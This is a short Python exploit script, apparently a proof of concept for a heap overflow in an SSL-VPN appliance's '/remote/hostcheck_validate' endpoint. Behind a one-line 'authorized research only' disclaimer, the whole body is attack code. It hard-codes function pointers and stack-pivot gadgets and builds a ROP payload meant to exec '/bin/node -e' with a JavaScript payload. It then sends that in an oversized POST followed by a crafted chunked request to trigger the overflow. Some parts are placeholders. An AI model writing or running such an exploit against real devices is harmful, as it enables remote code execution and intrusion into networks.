"""DISCLAIMER: For authorized security research only. Use only on systems you own or are explicitly authorized to test.""" import socket import time TARGET_HOST = "x.x.x.x" PORT = 80 # Function to create a socket def make_sock(target, port): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target, port)) return sock # Craft the payload ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00" getcwd_ptr = b"%70%62%2c%04%00%00%00%00" pivot_1 = b"%52%f7%fd%00%00%00%00%00" # push rdi; pop rsp; ret; pivot_2 = b"%ac%c9%ab%02%00%00%00%00" # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret; rop = b"%de%ad%be%ef" # Example ROP chain # Craft the form value form_value = b"" form_value += b"B" * 11 + b"/bin/node\0" + b"B" * 6 + b"-e\0" + b"B" * 14 + b"JS_PAYLOAD" form_value += b"B" * 438 + pivot_2 + getcwd_ptr form_value += b"B" * 32 + pivot_1 form_value += b"B" * 168 + b"CALL_EXECL" form_value += b"B" * 432 + ssl_do_handshake_ptr form_value += b"B" * 32 + rop # Craft the HTTP body body = (b"B" * 1808 + b"=" + form_value + b"&") * 20 # Craft the HTTP request data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n" data += b"Host: " + TARGET_HOST.encode("utf-8") + b"\r\n" data += f"Content-Length: {len(body)}\r\n".encode("utf-8") data += b"\r\n" data += body # Send the crafted request ssock1 = make_sock(TARGET_HOST, PORT) ssock1.sendall(data) time.sleep(1) ssock2 = make_sock(TARGET_HOST, PORT) data = b"POST / HTTP/1.1\r\n" data += b"Host: " + TARGET_HOST.encode("utf-8") + b"\r\n" data += b"Transfer-Encoding: chunked\r\n" data += b"\r\n" data += b"0" * 4137 + b"\0" data += b"A" * 1 + b"\r\n\r\n" ssock2.sendall(data)